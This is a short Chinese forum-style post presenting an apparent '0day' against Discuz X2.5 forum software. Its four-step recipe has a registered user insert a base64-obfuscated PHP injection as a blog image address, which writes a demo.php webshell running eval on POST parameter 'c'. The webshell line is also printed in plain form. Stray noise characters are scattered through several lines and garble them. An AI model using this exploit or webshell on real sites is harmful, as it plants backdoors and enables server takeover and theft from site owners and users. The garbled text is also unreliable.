DZ X2.5最新0day
9 y: L- I! f5 ^+ ~0 A1.注册任意账户
" o4 {2 l" _$ m2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了+ x P# _2 K, L/ e$ B
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码
) \3 j6 z# h) J3 ^% W<?php @eval($_POST[c]); ?>ok
) U3 N, W9 [" H3 a& K# p4 n& Y<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?> 6 U1 o: `) J$ o# i" J6 `
4.访问日志,论坛根目录下生成demo.php,一句发密码C |